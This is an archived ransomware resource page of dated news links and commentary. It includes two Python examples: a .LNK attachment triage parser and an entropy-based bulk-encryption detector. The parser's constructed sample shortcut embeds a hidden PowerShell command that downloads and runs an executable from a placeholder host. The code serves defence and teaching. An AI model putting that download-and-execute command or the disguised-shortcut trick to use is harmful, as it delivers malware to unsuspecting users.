Ransomware Resources

As I’m no longer regularly working in the security industry, this page is no longer being maintained. It’s left up here for historical reasons only.

David Harley, 15th April 2020

This is a general information resource: if your main interest is in recovering from and/or preventing an attack, you might want to go straight to the Ransomware Recovery and Prevention page.

I can’t help noticing that there’s much less detailed information about specific ransomware families these days, and I rarely see generic information with something new to say. That will inevitably impact on the currency of information on this resource, and how much priority I give it.

Breaking News

(Or stuff that doesn’t fit too easily into any of the categories below, so needs me to find time to add a category.) 

[29th October 2018]

Stephen Cobb for ESET: Ransomware and the enterprise: A new white paper
“Ransomware remains a serious threat and this new white paper explains what enterprises need to know, and do, to reduce risk”

[11th October 2018]

The recent (rescinded) Windows 10 upgrade – if you’ll pardon the expression – does seem to have attracted a load of scams as well as creating problems itself with profile corruption and deleted files and folders. Scams I’ve seen mentioned include ransomware masquerading as the upgrade installer [Microsoft doesn’t distribute upgrades – or links to upgrades – through email!], and tech support scammers offering ‘help’ with the upgrade (via phone calls or pop-ups). Here’s an example of the latter: Remove “Windows 10 Pro Update Failed” Fake Alerts (Microsoft Scam)

[10th October 2018]

Help Net, citing a report by Webroot: Cryptomining dethrones ransomware as top threat in 2018

[6th October 2018]

Pierluigi Paganini: Experts warns of a new extortion campaign based on the Breach Compilation archive – “Crooks attempted to monetize the availability of a huge quantity of credentials available in the underground market …. [using] the credentials collected in the infamous database dubbed ‘Breach Compilation’.”

[3rd October 2018]

Joseph Cox for Motherboard: Hackers Are Holding High Profile Instagram Accounts Hostage
Hackers have hijacked the accounts of at least four high profile Instagrammers recently, locking them out and demanding a bitcoin ransom.

[18th September 2018]

Mark Stockley for Sophos: The rise of targeted ransomware

“While cryptomining and cryptojacking have been sucking all the air out of the press room, a snowball that started rolling well before anyone had ever heard of WannaCry has been gathering pace and size.

The snowball is a trend for stealthier and more sophisticated ransomware attacks – attacks that are individually more lucrative, harder to stop and more devastating for their victims than attacks that rely on email or exploits to spread.”

[12th May 2018]

F-Secure: The Changing State of Ransomware

Help Net Security: Organisations across the UK are still struggling with ransomware

[25th April 2018]

Reuters: Ukrainian energy ministry website hit by ransomware attack

Graham Cluley: The firms that piggyback on ransomware attacks for profit “DON’T WANT TO PAY THE RANSOM? PAY US, AND WE’LL PAY IT FOR YOU! … It seems there are firms out there who are charging ransomware victims a hefty premium for the safe return of your data – when all that’s actually happening is they are paying the ransom on your behalf.”

Ross Ryan for the Prince Edward Island Guardian: P.E.I. government website hit by ransomware attack

[21st April 2018]

Help Net: Cryptominers displace ransomware as the number one threat. Summarizes a report from Comodo and also observes: “Another surprising finding: Altcoin Monero became the leading target for cryptominers’ malware, replacing Bitcoin.” Maybe not that surprising: see Cameron Camp’s article for ESET – Monero cryptocurrency: Malware’s rising star

[16th April 2018]

Researchers at Princeton: Machine Learning DDoS Detection for Consumer Internet of Things Devices. “…In this paper, we demonstrate that using IoT-specific network behaviors (e.g. limited number of endpoints and regular time intervals between packets) to inform feature selection can result in high accuracy DDoS detection in IoT network traffic with a variety of machine learning algorithms, including neural networks.” Commentary from Help Net: Real-time detection of consumer IoT devices participating in DDoS attacks

[20th March 2018]

If I had a separate category for ‘miscellaneous extortion’ this might belong there. Included here because it isn’t just a hoax, but one that centres on extortion, though it looks as if the point is to embarrass/harass the apparent sender of the extortion email (the Michigan company VELT) rather than actually make a direct profit from extortion. The company’s CEO told the BBC that the attacker was probably a Minecraft player who had been banned from the Veltpvp server and was taking revenge.

The BBC: School bomb threats: Disgruntled Minecraft gamer ‘behind hoax’

The Guardian: School bomb threats: more than 400 schools in England receive hoax warnings “Police say threats contained in emails are not credible and evacuations are unnecessary.”

The Telegraph: Hackers target more than 400 schools with bomb hoax.

[8th March 2018]

An article on ransomware I contributed to ESET’s Trends 2018 report has been republished as a blog article on WeLiveSecurity. Trends 2018: The ransomware revolution

[8th February 2018]

Catalin Cimpanu for Bleeping Computer: Researcher Bypasses Windows Controlled Folder Access Anti-Ransomware Protection

Cimpanu observes:

The user must manually approve any app that’s allowed to edit files located in CFA folders by adding each app’s executable to a whitelist…But Yago Jesus, a Spanish security researcher with SecurityByDefault, has discovered that Microsoft has automatically whitelisted all Office apps on this list.

In SecurityByDefault’s article, Jesus states that:

…an attacker could perform a Ransomware attack bypassing Windows Defender protection activating the native encryption feature of Microsoft Office.


Iain Thompson for The Register: Good news, everyone: Ransomware declining. Bad news: Miscreants are turning to crypto-mining on infected PCs – Screw asking for digi-coins. Craft ’em on 500,000 computers

If a regular timeline is of use to you, David Balaban contacted me about his Ransomware Chronicle, which tersely flags ‘New ransomware released’, ‘Old ransomware updated’, ‘Ransomware decrypted’ and ‘Other important events’. No links to further information, though, which limits its usefulness. Apparently he also provides ransomware reports for Tripwire’s State of Security blog. He told me that he intends to add links (but that doesn’t seem to have happened to date [February 2018] so I’m not holding my breath). Some of the other material on that web site may be of use to you, though, so I’m leaving the links here for the moment.


Yes, I know it’s a bit weird to have the Index as the 2nd item and including the index. I still have to find time to organize this better while making it as easy as possible to update.

Sorry, not yet live links, as I may well reorganize the page sooner rather than later. However, I wanted to get this thing Out There in some form and time has been a problem.


Ransomware is hardly a new issue – in fact, my own first engagement with the wacky world of malware was with the ‘AIDS Trojan’, sometimes cited as the first ransomware, at the end of the 1980s – but the impact of the ransomware problem seems to have increased dramatically in the past few months, so I thought perhaps it was time to set up a page somewhat along the lines of AVIEN’s tech support scams page.

4th/5th April 2018

[1st March 2018]

Malwarebytes: Encryption 101: ShiOne ransomware case study. Practical part of a series that started with Encryption 101: a malware analyst’s primer. Best to read the primer first.

[14th December 2017]

ESET’s report Cybersecurity Trends 2018: The Cost Of Our Connected World may be of particular relevance on this site, in that it includes my article ‘The ransomware revolution’.


As reported by Help Net, Bitdefender suggests that:

  • 54% of all malware targeting the UK is ransomware
  • For the US the figure is 61.8%
  • The Cryptowall gang extorted more than $325m from victims in the US alone.

On 26th January 2016, Foursys published the results of its cybersecurity survey: IT Security Survey Results: “Cybersecurity in 2016 and beyond”. Questions were posed to more than 400 organizations in the UK, from SMEs to major corporates and public sector organizations. Somewhat alarmingly, of the 15.8% of respondents who admitted to a security breach event in 2015 (a further 15.8% declined to disclose), 41.9% said they’d suffered a ransomware breach, which is why I’m mentioning it here. The overall results of the survey are summarized in infographic form here.

Here are some resources that people who’ve only just come across ransomware (and are, unsurprisingly, alarmed about it) may find useful.

The first sections include some basic information on the ransomware problem, and links to further information.

Basic Information

Added July 25th 2017:

SecurityWeek contributor Kevin Townsend asked me about a report from the UK’s De Montfort University on the psychology of ransomware splash screens. Here’s the article he published – Researcher Analyzes Psychology of Ransomware Splash Screens – and here are some further thoughts from me published on the ESET blog: Social engineering and ransomware.

Added articles to this site on July 4th 2017:

AV-Test Report: malware/threat statistics

AV-Test offers an interesting aggregation of 2016/2017 malware statistics in its Security Report here. Its observations on ransomware may be of particular interest to readers of this blog (how are you both?) The report points out that:

There is no indication based on proliferation statistics that 2016 was also the “year of ransomware“. Comprising not even 1% of the overall share of malware for Windows, the blackmail Trojans appear to be more of a marginal phenomenon.

But as John Leyden remarks for The Register:

The mode of action and damage created by file-encrypting trojans makes them a much greater threat than implied by a consideration of the numbers…

Looking at the growth in malware for specific platforms, AV-Test notes a decrease in numbers for malware attacking Windows users. (Security vendors needn’t worry: there’s still plenty to go round…)

On the other hand, the report says of macOS malware that ‘With an increase rate of over 370% compared to the previous year, it is no exaggeration to speak of explosive growth.’ Of Android, it says that ‘the number of new threats … has doubled compared to the previous year.’

Of course, there’s much more in this 24-page report. To give you some idea of what, here’s the ToC:

  • The AV-TEST Security Report 2
  • WINDOWS Security Status 5
  • macOS Security Status 10
  • ANDROID Security Status 13
  • INTERNET THREATS Security Status 16
  • IoT Security Status 19
  • Test Statistics 22

Windows 10 Controlled folder access

[25th October 2017]

Help Net Security: Is the Windows 10 controlled folder access anti-ransomware feature any good?

[Added 23rd October 2017: Catalin Cimpanu for Bleeping Computer: Microsoft’s Windows 10 Anti-Ransomware Feature Is Now Live ]

Microsoft describes the new Windows 10 feature ‘Controlled folder access in Windows Defender Antivirus’ in the article Announcing Windows 10 Insider Preview Build 16232 for PC + Build 15228 for Mobile. The article specifically mentions ransomware as one of the threats against which it is likely to be effective.

The article states that ‘Controlled folder access monitors the changes that apps make to files in certain protected folders. If an app attempts to make a change to these files, and the app is blacklisted by the feature, you’ll get a notification about the attempt. You can complement the protected folders with additional locations, and add the apps that you want to allow access to those folders.’

It’s not clear what criteria are used to blacklist an application: as I read it, it may simply use Windows Defender’s scanning engine to determine the status of an app. I guess I’ll wait for more information before deciding how much additional protection this really provides.

Zeljka Zorz comments for Help Net Security :

Whether this security feature will be enough to stop ransomware remains to be seen, especially if ransomware can get a whitelisted application to bypass the protection and offer a way in.

I wasn’t really thinking of this in terms of whitelisting until I read that, but the feature does, in fact, allow the user to add protected locations apart from the default folders, and also to ‘Allow an app through Controlled folder access’. Which opens the door to social engineering as well as subversion of apps, but then that’s a persistent issue with whitelisting applications.

[11th November 2016]

Everything you need to know about ransomware by John Snow, for Kaspersky.  I think the title is a bit hyperbolic, but it could be a useful introduction.

[19th October 2016]

Malwarebytes CEO Marcin Kleczynski is heavily quoted by Steve Melendez in an article suggesting an ever-increasing correlation between tech support scams using malware and unequivocal ransomware: Tech Support Scams Are Getting More Sophisticated

[3rd August 2016]

The latest SANS ‘Ouch!’ newsletter is dedicated to a description of ransomware and tips on how to counter it.  And no, I have no idea why they chose the name Ouch!

Like other editions, this particular newsletter issue is presumably aimed primarily at home users rather than corporates. (Though it does include a link to the SANS Advanced Cybersecurity Learning Platform.) At any rate, it’s fairly simplistic. However, it’s accurate enough (though I’d take issue with the fact that it seems to suggest that cloud-based backups are safe from ransomware, which isn’t always true).

Anyway, anything that might help raise awareness and understanding of the issue among the general population is worth publicizing.

[12th May 2016]

I haven’t checked out Troy Hunt’s Introduction to Ransomware video for Varonis yet myself. If I can find time to, I’ll report back here. But I’d be surprised if it turned out to be useless. 🙂 It is apparently free, and you can watch three of the eight lessons before deciding whether to register.

Unit 42’s document Unlocking the lucrative criminal business model is a reasonable overview of the ransomware issue generally. Palo Alto’s Ryan Olson announced it here: Ransomware Is Not a “Malware Problem” – It’s a Criminal Business Model. OK, but actually most malware nowadays conforms to a business model…

What is Ransomware?

Here’s a succinct definition from ESET. Other brands and definitions are available. 🙂 However, my close association with the company means that I can lay hands quite quickly on information it provides, so I’m not embarrassed to use it. I will, of course, try to include useful information from any source, including ESET’s direct competitors.

A particular kind of malicious software used for extortion. When activated, ransomware prevents access to a device or the data on it until the victim pays a fee.

Wikipedia’s definition, though hardly comprehensive, is close enough, and more expansive than the VirusRadar glossary definition. In particular, it makes clearer the fact that there is a difference between encrypting and non-encrypting (locking) ransomware.

Here’s an excellent definition by Martin Overton: his presentation here makes very useful reading.

Ransomware is a type of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator(s) of the malware in order for the restriction to be removed. Some forms of ransomware encrypt files on the system’s hard drive (cryptoviral extortion, a threat originally envisioned by Adam Young and Moti Yung), while some may simply lock the system and display messages intended to coax the user into paying.

The Cryptoviral FAQ, as a matter of interest, is here.

From an article for IT Security UK on 15th December 2015: ‘Perhaps Information Security (the magazine and the industry) is on safer ground when it refers to more specific trends (as flagged by McAfee). Perhaps the most interesting (if disquieting) from my point of view is the assertion that ransomware ‘…grew 155% year-on-year thanks to the ready availability of low-cost ‘ransomware-as-a-service’ tools on the darknet.’

Refers to this article in Infosecurity Magazine.

[5th June 2016]

Tom Spring for Kaspersky ThreatPost: RESEARCHERS UNCOVER AFFILIATE NETWORK FOR RANSOMWARE. Refers to two reports by Flashpoint on ransomware in Russia: Ransomware as a Service: Inside an Organized Russian Ransomware Campaign and Hacking Healthcare: Cybercriminals Find Value in Holding Data Hostage As Alternative to Putting it Up For Sale.

Product Testing

[5th August 2016]

Testing lab SE Labs has been testing anti-malware programs in order to evaluate their effectiveness against ransomware: Anti-malware vs. ransomware: latest reports

There are reports covering products intended for large businesses/enterprises, small-to-medium businesses, and home users/consumers. I haven’t looked at them in detail yet, but I expect them to be up to Simon Edwards’ usual high standards.

[This item also posted to the Anti-Malware Testing blog.]

Encrypting versus Non-Encrypting Ransomware

The essential difference between the two is that crypto ransomware (ransomware that encrypts files is often known as a filecoder) uses some form of encryption to scramble data. The idea is that the data becomes inaccessible to the victim until he or she pays the extortionist to allow them to decrypt (unlock) their data. Malware authors have not always been associated with efficient encryption, but nowadays there is often no simple way to retrieve encrypted files without paying the extortionist. (Who may or may not, of course, help you decrypt them even when you’ve paid.) And if ever I heard an argument for a good backup strategy…

Other forms of ransomware don’t necessarily (directly) involve encryption, but are nevertheless intended to block the victim’s access to their device or data, or at least to persuade the victim that access is blocked. Sometimes, the blocking is easily bypassed. Sometimes it isn’t there at all, but involves a fake pop-up along the same lines as those used by some tech support scammers. We don’t include tech support scams in the ransomware category, but both types of attack involve getting money from victims for fixing (sometimes) issues that were caused or fabricated by the criminal. Sometimes, however, tech support scams and ransomware are more or less directly related. 

Delilah: Ransomware and Recruitment

When Chuck Berry recorded ‘Beautiful Delilah’ back in the 1950s, he wasn’t thinking of anything like the Trojan described by Diskin, according to Gartner’s Avivah Litan, as gathering ‘enough personal information from the victim so that the individual can later be manipulated or extorted.’ By which the company seems to include recruiting insiders by coercing them into leaking data.

The article concludes:

Insider threats are continuing to increase with active recruitment of insiders from organized criminals operating on the dark web.

Commentary by Darren Pauli for The Register: Extortion trojan watches until crims find you doing something dodgy – And then the extortion starts and you’re asked to steal critical data

[Added 22nd July 2016]

Useful resources from F-Secure:

Commentary by The Register: Ransomware gang: How can I extort you today? Step 1. Improve customer service. Step 2.???? Step 3 PROFIT!!!

Doxing and Extortion

Here’s a slightly different twist on extortion that doesn’t involve ransomware. Steve Ragan describes for CSO Salted Hash how a Website offers Doxing-as-a-Service and customized extortion. The subtitle explains the business model:

Those posting Dox will get a commission, or they can pay to have someone’s personal details exposed

The amount of commission depends on the type of Doxing. In ascending order of payment:

  • Miscellaneous
  • Revenge
  • Paedophiles [the American spelling is used by the site: Cymmetria’s Nitsan Saddan is quoted as believing that it’s likely that ‘these are American players.’]
  • Law enforcement
  • Famous

The DaaS-tardly doxing service is priced according to the type of information collected, from the barest details to a complete profile. Ragan observes that the service doesn’t seem to be collecting customers – at any rate:

…the Bitcoin wallet used to process payments for this service has received no transactions.

And he has seen little traction on the site since he’s been monitoring it. Nevertheless, he predicts that this kind of activity will become more common.

[5th June 2016]

Not ransomware, but related in that it clearly involves extortion/blackmail: the FBI has issued an alert about Extortion E-Mail Schemes Tied To Recent High-Profile Data Breaches. The threatening messages arrive in the wake of a flood of revelations of high-profile data thefts. The ready availability of stolen credentials is used by crooks to convince victims that they have information that will be released to friends ‘and family members (and perhaps even your employers too)’ unless a payment of 2-5 bitcoins is received.

The generic nature of some of the messages quoted by the FBI doesn’t suggest that the scammer has any real knowledge of the targets or of information that relates to them.

‘If you think this amount is too high, consider how expensive a divorce lawyer is. If you are already divorced then…’

This sounds more like mass mail-outs in the hope that some will reach a target sufficiently guilt-ridden to pay up just in case. Other messages may well frighten some people, fearful of being ‘doxed’, into paying up in case their personally-identifiable information falls into the wrong hands.

What can I do about it?

[5th August 2016]

Paul Ducklin describes in some detail the rising tide of ransomware arriving by email attachment in the form of a .LNK file, and how this bit of trickery works: Beware of ransomware hiding in shortcuts. It’s by no means a new approach to distributing malware, but evidently still successful, not least because ‘LNK files don’t follow the View file name extensions setting in File Explorer, and … they can show up with an icon that is at odds with their real behaviour…’

Fortunately, Paul includes a series of useful tips that mitigate your exposure to this particular malicious behaviour although it doesn’t block it completely. Including this one:

  • Never open LNK files that arrive by email. We can’t think of any situation in which you would need, or even want, to use a LNK file that came via email. The name and icon will probably be misleading, so keep your eyes peeled for the tiny arrow that Windows shows at the bottom left of the icon.”

As true now as it was years ago…
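Added here as a worked example, and not code from Paul Ducklin’s article or from Sophos: a Python sketch of the check a mail gateway or an incident responder can apply to an attachment. It identifies a shell link by its fixed header rather than by its name, recovers the path and command-line arguments the link would run, and flags the double-extension trick (“Invoice.pdf.lnk” is displayed as “Invoice.pdf”, because Explorer always hides “.lnk”). The layout follows Microsoft’s MS-SHLLINK specification; the sample link, the list of interpreters, and the verdict keys are constructed for this example.

```python
import struct

# Added example: identify a Windows shell link (.LNK) by its header rather
# than its name, then pull out what it would run. Layout per MS-SHLLINK;
# the sample file below is constructed here, not captured from a campaign.

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
HAS_NAME = 1 << 2
HAS_RELATIVE_PATH = 1 << 3
HAS_WORKING_DIR = 1 << 4
HAS_ARGUMENTS = 1 << 5
HAS_ICON_LOCATION = 1 << 6
IS_UNICODE = 1 << 7
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that starts the target minimised

# Assumed list of interpreters a document-shaped link has no business launching.
INTERPRETERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript",
                "mshta", "rundll32", "regsvr32")


def is_shell_link(data: bytes) -> bool:
    """True if the bytes begin with the fixed 76-byte ShellLinkHeader."""
    return (len(data) >= LNK_HEADER_SIZE
            and data[:4] == struct.pack("<I", LNK_HEADER_SIZE)
            and data[4:20] == LNK_CLSID)


def parse_shell_link(data: bytes) -> dict:
    """Return ShowCommand plus the StringData fields (target, working dir, args...)."""
    if not is_shell_link(data):
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + the list itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        if flags & IS_UNICODE:
            raw, pos = data[pos:pos + 2 * count], pos + 2 * count
            return raw.decode("utf-16-le")
        raw, pos = data[pos:pos + count], pos + count
        return raw.decode("cp1252", "replace")

    fields = {"show_command": show_command}
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        fields[key] = read_string() if flags & flag else None
    return fields


def triage_attachment(filename: str, data: bytes) -> dict:
    """Gateway-style check: a LNK is a LNK whatever its name or icon says."""
    verdict = {"is_lnk": is_shell_link(data), "displayed_name": filename,
               "target": None, "arguments": None, "interpreter": False, "minimised": False}
    if not verdict["is_lnk"]:
        return verdict
    if filename.lower().endswith(".lnk"):
        verdict["displayed_name"] = filename[:-4]  # what the user actually sees in Explorer
    info = parse_shell_link(data)
    verdict["target"] = info["relative_path"]
    verdict["arguments"] = info["arguments"]
    verdict["interpreter"] = any(i in (info["relative_path"] or "").lower() for i in INTERPRETERS)
    verdict["minimised"] = info["show_command"] == SW_SHOWMINNOACTIVE
    return verdict


def build_sample_lnk(relative_path: str, working_dir: str, arguments: str,
                     show_command: int = SW_SHOWMINNOACTIVE) -> bytes:
    """Constructed sample: a minimal Unicode link with no IDList or LinkInfo."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + s(relative_path) + s(working_dir) + s(arguments)


# Constructed "invoice" of the kind the article describes (URL is deliberately invalid).
SAMPLE_LNK = build_sample_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "%TEMP%",
    '-NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest http://example.invalid/x '
    '-OutFile $env:TEMP\\x.exe; & $env:TEMP\\x.exe"',
)

if __name__ == "__main__":
    print(triage_attachment("Invoice_4412.pdf.lnk", SAMPLE_LNK))
    print(triage_attachment("Invoice_4412.pdf", b"%PDF-1.7\n"))
```

The parser skips the LinkTargetIDList and LinkInfo blocks when they are present, so it reads real links as well as the minimal constructed one. The point of checking the header is that neither the name nor the icon is trustworthy: the same bytes would be caught whether the attachment were called Invoice_4412.pdf.lnk or wore a PDF icon.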

[4th August 2016] Further to the Europol initiative I allude to below, Kevin Townsend followed up in a story here: 40 Percent of Companies Will Pay the Ransom. I’m quoted in the article, but I’m in the process of writing a follow-up article of my own which I’ll flag here when it’s published.

26th July 2016

Europol, the European Union’s law enforcement agency, has announced an initiative to address the ransomware issue. (Hat Tip to Kevin Townsend, who first brought it to my attention.)

The agency’s announcement tells us that:

No More Ransom (www.nomoreransom.org) is a new online portal aimed at informing the public about the dangers of ransomware and helping victims to recover their data without having to pay ransom to the cybercriminals…

…The project has been envisioned as a non-commercial initiative aimed at bringing public and private institutions under the same umbrella. Due to the changing nature of ransomware, with cybercriminals developing new variants on a regular basis, this portal is open to new partners’ cooperation.

The site includes:

  • Crypto Sheriff – a form for helping victims try to find out which malware they’re affected by and whether a decrypter is available. Sounds like a potentially useful resource, even though the little graphic reminds me a little of the late, lamented Lemmy rather than a hi-tech search facility. Somewhat similar to MalwareHunter’s ID Ransomware facility.
  • A Ransomware Q&A page
  • Prevention Advice
  • An About page
  • Advice on how to Report a Crime
  • And a limited range of decryption tools from Kaspersky (mostly) and Intel.

Infosecurity Magazine’s commentary notes that:

‘In its initial stage, the portal contains four decryption tools for different types of malware, including for CoinVault and the Shade Trojan. In May, ESET claimed that it had contacted TeslaCrypt’s authors after spotting a message announcing they were closing their ‘project’ and offered a decryption key.

‘Raj Samani, EMEA CTO for Intel Security, told Infosecurity that both Intel Security and Kaspersky had developed decryption tools to apply against Teslacrypt, and these will be posted to the website shortly.

Well, I’m not in a position to compare the effectiveness of various TeslaCrypt decrypters, and I do understand that it’s important for “The update process for the decryption tools page …[to]… be rigorous.” And the AVIEN site is certainly not here to pursue ESET’s claim to a portion of the PR pie. Still, there are decrypters around from a variety of sources apart from the companies already mentioned (see Bleeping Computer’s articles for examples). I hope other companies and researchers working in this area will throw their hats into the ring in response to Europol’s somewhat muted appeal for more partnerships, so that the site benefits from a wider spread of technical expertise and avoids some of the pitfalls sometimes associated with cooperative resources. As it states on the portal:

“the more parties supporting this project the better the results can be, this initiative is open to other public and private parties”.

12th July 2016

Researchers from the University of Florida and Villanova University suggest that ransomware can be mitigated by detecting its encrypting files early in the process:

CryptoLock (and Drop It): Stopping Ransomware Attacks on User Data

A good idea, but some anti-malware programs already do something like this (i.e. flag programs that start encrypting files in bulk). But still a good idea. At The Register, Richard Chirgwin offers a round of applause:

Florida U boffins think they’ve defeated all ransomware – Crypto Drop looks for tell-tale signs that files are being encrypted
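As an added illustration (my own code, not the CryptoDrop authors’ implementation), here is a toy version of the heuristic the paper describes: watch each process’s writes, treat a write as suspicious when it replaces low-entropy, recognisable content with near-random content that has lost its file header, and suspend the process once it has done that to several files within a short window. The thresholds, the window, and the SHA-256 counter-mode stream cipher standing in for the ransomware’s real cipher are assumptions made for the example, and the files are constructed. It also shows the limit of the approach that bears on the advice further down this page about pre-encrypting your own data: a file the owner had already encrypted is simply encrypted again, and because it was high-entropy to begin with the detector sees no jump.

```python
import hashlib
import math
from collections import Counter, defaultdict, deque

# Added example, not CryptoDrop's code: a toy per-process "is this program
# turning ordinary files into ciphertext?" monitor. Thresholds are assumed.

KNOWN_MAGIC = {
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip/ooxml",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2",
    b"\x89PNG\r\n\x1a\n": "png",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext, around 4 to 5 for English text."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def file_type(data: bytes) -> str:
    for magic, name in KNOWN_MAGIC.items():
        if data.startswith(magic):
            return name
    return "unknown"


def looks_like_encryption(before: bytes, after: bytes) -> bool:
    """One write is suspicious when the new content is near-random, much more
    so than the old content, AND the recognisable header is gone. A legitimate
    archiver produces high entropy but keeps its header; editing a document
    keeps entropy low."""
    e_before, e_after = shannon_entropy(before), shannon_entropy(after)
    return (e_after >= 7.0 and e_after - e_before >= 1.5
            and file_type(after) == "unknown")


class BulkEncryptionMonitor:
    def __init__(self, window_seconds: float = 10.0, max_suspicious_files: int = 3):
        self.window = window_seconds
        self.limit = max_suspicious_files
        self._hits = defaultdict(deque)  # pid -> deque of (timestamp, path)

    def observe(self, pid: int, t: float, path: str, before: bytes, after: bytes) -> bool:
        """Feed one completed write; return True when pid should be suspended."""
        if not looks_like_encryption(before, after):
            return False
        hits = self._hits[pid]
        hits.append((t, path))
        while hits and t - hits[0][0] > self.window:
            hits.popleft()
        return len({p for _, p in hits}) >= self.limit


def toy_encrypt(key: bytes, data: bytes) -> bytes:
    """Stand-in for the ransomware's cipher: SHA-256 in counter mode as a keystream."""
    out = bytearray()
    for i in range(0, len(data), 32):
        ks = hashlib.sha256(key + i.to_bytes(8, "little")).digest()
        out += bytes(a ^ b for a, b in zip(data[i:i + 32], ks))
    return bytes(out)


def simulate() -> dict:
    """Constructed workload; returns which observations raised an alert."""
    mon = BulkEncryptionMonitor()
    pdf = b"%PDF-1.7\n" + b"Quarterly report, nothing but ordinary prose. " * 80
    docx = b"PK\x03\x04" + b"word/document.xml with plain text inside " * 80
    notes = b"meeting notes: " + b"backups, budgets, " * 200
    vault = toy_encrypt(b"owner-key", notes)  # file the owner had already encrypted
    results = {}
    # pid 100: user saves an edited document; entropy stays low, header intact.
    results["edit"] = mon.observe(100, 0.0, "report.pdf", pdf, pdf + b" (revised)")
    # pid 200: a legitimate archiver writes high-entropy data but keeps its header.
    results["zip"] = mon.observe(200, 1.0, "notes.zip", b"", b"PK\x03\x04" + toy_encrypt(b"z", notes))
    # pid 666: ransomware sweeps the folder; third distinct file trips the limit.
    k = b"ransom-key"
    results["rw1"] = mon.observe(666, 2.0, "report.pdf", pdf, toy_encrypt(k, pdf))
    results["rw2"] = mon.observe(666, 2.1, "budget.docx", docx, toy_encrypt(k, docx))
    results["rw3"] = mon.observe(666, 2.2, "notes.txt", notes, toy_encrypt(k, notes))
    # Limit: a file the owner already encrypted shows no entropy jump when re-encrypted.
    results["pre_encrypted"] = looks_like_encryption(vault, toy_encrypt(k, vault))
    return results


if __name__ == "__main__":
    print(simulate())
```

The per-write test is deliberately conservative (three indicators must agree) because a monitor that kills your backup software or your archiver mid-run is its own denial of service; the cost is that content which is already compressed or encrypted, or a strain that preserves file headers, slips past the entropy and header checks, which is why this belongs alongside, not instead of, offline backups.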

22nd June 2016

An article on Help Net suggests that businesses may be putting too much faith in their backup processes. I’m not sure how likely that is. Most businesses would not pay in the event of a ransomware attack. Stats come from IDT11, apparently, but I didn’t find the source material.

8th June 2016:

Ransomware Tracker offers various types of blocklists that allow you to block ransomware botnet C&C traffic. I haven’t looked at it, but it may be useful.

[2nd June 2016]: Phishme reports that 93% of phishing emails contain encryption ransomware.

  • If there’s anyone out there who still thinks it can’t happen to them, think again. Of course you can lessen the risk by using common sense and good computer hygiene, not opening dubious attachments or visiting dubious sites, and using security software.
  • [14th April 2016] A few times I’ve seen it suggested that encryption of valuable data before ransomware strikes will somehow protect it against ransomware. Today I came across the same assertion again on Spiceworks, apparently suggested to a Spiceworks subscriber by a lecturer. Not a lecturer in IT security, I hope… I guess whether there’s any truth in the assertion depends on what you understand by encryption.
    • If files can be modified they can be encrypted: ransomware doesn’t check to see if a file is encrypted and throw its hands up in despair if it is, it simply adds another layer of encryption.
    • If the media on which the files reside can’t be accessed without a password then presumably the files themselves can’t be modified while the media are inaccessible.
    • However, if the media are accessible and write-enabled because the files are in use, the chances are that ransomware will be able to encrypt the files, irrespective of whether they are already somehow encrypted by the legitimate owner or user of the aforementioned files.

Much the same considerations apply to backups, of course. If the backup media are accessible while the ransomware delivers its unpleasant payload, there’s a ‘good’ chance that the backed up files will also be encrypted.

[This article – Mac OS X ransomware: How KeRanger is a shadow of malware to come – The design of KeRanger demonstrates how attackers plan to make it even harder for victims of ransomware not to pay up – includes an interesting if confusing/confused comment from Timothy Wallach of the FBI:

“The best prevention for ransomware is to have thorough backups that are off the network, as well as encrypting your own data. That way if the bad guys encrypt it with their ransomware you still have it…”

It would be interesting to know if that’s exactly what Wallach said, since I’d rather like to know what he meant by ‘encrypting your own data’.]

  • Back up your data to an external device. And to cloud services as well, if you like. Bear in mind, though, that if your data is backed up somewhere that’s ‘always on’ while you’re using your computer, there’s a risk that ransomware (or other malicious software) might be able to encrypt, delete or corrupt your backed-up data too. In Ransomware a Threat to Cloud Services, Too Brian Krebs notes an instance where, when one of Children in Film’s employees opened an attachment passed off as an invoice: within 30 minutes, over 4,000 files on a cloud server, mounted as a local drive, had been encrypted by Teslacrypt. Fortunately, according to Krebs, the cloud hosting company kept daily backups and the company was able to use BleepingComputer’s TeslaDecoder to decrypt the files without paying the extortionists, but the inconvenience was still significant. But it’s not just a matter of how effective your defences are. Quocirca’s Bob Tarzey suggests for Infosecurity Magazine that Dropbox’s versioning (and indeed Google’s) offers some mitigation to ransomware even where it encrypts content backed up to the cloud: Your Money or Your Data? Mitigating Ransomware with Dropbox
